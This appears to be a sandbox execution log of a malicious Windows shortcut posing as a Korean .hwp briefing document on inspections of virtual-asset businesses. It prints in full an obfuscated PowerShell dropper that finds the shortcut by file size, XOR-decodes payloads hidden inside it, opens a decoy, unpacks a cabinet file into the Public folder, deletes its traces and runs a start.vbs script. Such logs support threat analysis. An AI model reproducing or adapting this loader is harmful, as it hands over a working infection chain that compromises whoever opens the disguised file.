cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "YkhOq" C:\Users\test22\AppData\Local\Temp\가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk
2536cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function stiff{param($attended); <#right distinction#>$management = $attended.substring(0,$attended.length-4) + ''; <#african plaster#>return $management;};function female{param($partly);<#honorable plead#> remove-item <#oppression establish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$extent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System.IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open,<#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.Seek(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh*0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infection must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recover#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe crime#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosperity#>$cluster[$think]=$close[$think*0x01] -bxor $profession;$think++;}<#conceal moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleading#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $confusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env:public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest bronze#> return $assign;};function vicious{param($station); <#vehemence desirous#>$surround = Split-Path $station;<#palate pine#> return $surround;};function make{return Get-Location;};function overpower{<#compress exercise#>return $env:Temp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanation subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#>$ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa silicon#> return $river;};function enlarged{$introduce = $env:public<#vassal marginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $introduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO.Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System.IO.FileInfo]::new($_); <#cleavage shears#> if ($enlarge.Length -eq 0x00119A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue;<#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profession <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleavage failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $assault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler successive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#restrict head#>& $tabernacle;") )
2648cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
2744cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
2800findstr.exe findstr /i rshell.exe
2840powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function stiff{param($attended); <#right distinction#>$management = $attended.substring(0,$attended.length-4) + ''; <#african plaster#>return $management;};function female{param($partly);<#honorable plead#> remove-item <#oppression establish#> -path $partly <#holy incident#> -force;};function twin{param($plane,$extent,$fresh,$profession,$elder);<#sixteenth parish#> $latin=New-Object System.IO.FileStream(<#trust painful#>$plane,<#join apron#>[System.IO.FileMode]::Open,<#spirited tarnish#>[System.IO.FileAccess]::Read);<#pocket cleanse#> $latin.Seek(<#utterly tumultuous#>$extent,[System.IO.SeekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh*0x01;<#seaweed cloister#> $cluster=New-Object byte[] <#infection must#>$fresh; <#check integrity#> $close=New-Object byte[] <#whole recover#>$hissing; <#cherish fond#>$latin.Read(<#above fitting#>$close,0,<#stripe crime#>$hissing); $latin.Close();$think=0;while($think -lt $fresh){<#wreck prosperity#>$cluster[$think]=$close[$think*0x01] -bxor $profession;$think++;}<#conceal moon#> set-content $elder <#wheat scope#> $cluster -Encoding <#acquire pleading#> Byte;};function slowly{param($confusion, $exalt);<#crest undue#> expand $confusion <#surgery headdress#> -F:* $exalt;};function locomotive{$assign = $env:public<#ballast seventy#> + '\' +<#reveal hastily#> 'docu'+'ment'+'s';<#chest bronze#> return $assign;};function vicious{param($station); <#vehemence desirous#>$surround = Split-Path $station;<#palate pine#> return $surround;};function make{return Get-Location;};function overpower{<#compress exercise#>return $env:Temp;};function annoy{$heat = make; $ligature = noisy -aerial $heat; <#explanation subtle#>if($ligature.length -eq 0) {$heat = overpower; <#playing attention#>$ligature = noisy -aerial $heat;} return $ligature;};function riding{$river = $env:public<#studious kind#> + '\' + 'co'+'nti'+'nen'+'t.'+'ca'+'b';<#anthozoa silicon#> return $river;};function enlarged{$introduce = $env:public<#vassal marginal#>+'\doc'+'ume'+'nts\'+'sta'+'rt'+'.v'+'bs';<#danger infect#> return $introduce;};function noisy{param($aerial); <#bowsprit pipe#> $unity=''; [System.IO.Directory]::GetFiles($aerial, '*.'+'lnk', [System.IO.SearchOption]::AllDirectories) | <#covering speed#>ForEach-Object { <#inspect monkey#> $enlarge = [System.IO.FileInfo]::new($_); <#cleavage shears#> if ($enlarge.Length -eq 0x00119A2C) { <#retail file#> $unity = $enlarge.FullName;}}; return <#vowel reply#> $unity;};$undue = annoy;<#posture manifold#>$testify = vicious -station $undue;<#belonging derivative#> $consign = stiff -attended $undue;twin -plane <#being tight#> $undue -extent <#sulphuric reign#> 0x000021A2 -fresh 0x0000B200 -profession <#appendix motive#> 0x2B -elder <#inscription antelope#> $consign;<#cleavage failing#> & $consign;$assault=riding;<#consequence spin#>twin -plane <#beak stop#> $undue -extent <#tunnel violet#> 0x0000D3A2 -fresh <#pointed accuse#> 0x00013CD8 -profession <#salmon effect#> 0x72 -elder <#illustration thorax#> $assault;<#form grasping#>female -partly $undue;$tyrant = locomotive;<#tumbler successive#>slowly -confusion $assault -exalt <#possess carbonate#>$tyrant;<#repeat signify#>female -partly $assault;$tabernacle = <#front imposing#>enlarged;<#restrict head#>& $tabernacle;"
2888expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\continent.cab -F:* C:\Users\Public\documents
3008